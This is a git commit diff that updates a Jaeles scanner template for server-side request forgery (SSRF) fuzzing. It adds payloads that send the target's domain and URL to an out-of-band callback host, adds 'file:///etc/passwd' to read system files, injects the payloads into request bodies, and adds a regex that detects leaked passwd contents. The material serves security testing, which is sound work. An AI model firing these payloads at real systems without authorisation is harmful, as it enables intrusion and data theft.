Update ssrf.yaml

jaeles-project · Dec 21, 2020 · 59738d8 · 59738d8
1 parent 6ff4ea0
commit 59738d8
Showing 1 changed file with 7 additions and 6 deletions.
diff --git a/fuzz/common/ssrf.yaml b/fuzz/common/ssrf.yaml
@@ -3,23 +3,24 @@ type: fuzz
 info:
   name: SSRF
   risk: High
-
+  author: "@GochaOqradze"
+
 # jaeles scan -p 'dest=xx.burpcollaborator.net' ...
 params:
   - dest: '{{.oob}}'
 
 payloads: 
-  - "http://{{.dest}}"
-  - "{{.dest}}/ssrf.txt"
-  - "{{.dest}}"
+  - "http://{{.Domain}}.{{.dest}}/{{.URL}}"
+  - "https://{{.Domain}}.{{.dest}}/{{.URL}}"
+  - "file:///etc/passwd"
 
 requests:
   - redirect: true
   - generators:
       - Query("{{.payload}}")
+      - Body("{{.payload}}")
       - Path("{{.payload}}", "*")
 
   - detections:
       - >-
-        StringSearch("response", "ssrfhere")
-
+        RegexSearch("Resbody", "(?m)<html><body>[a-z0-9]+</body>|root:[x*]:0:0:")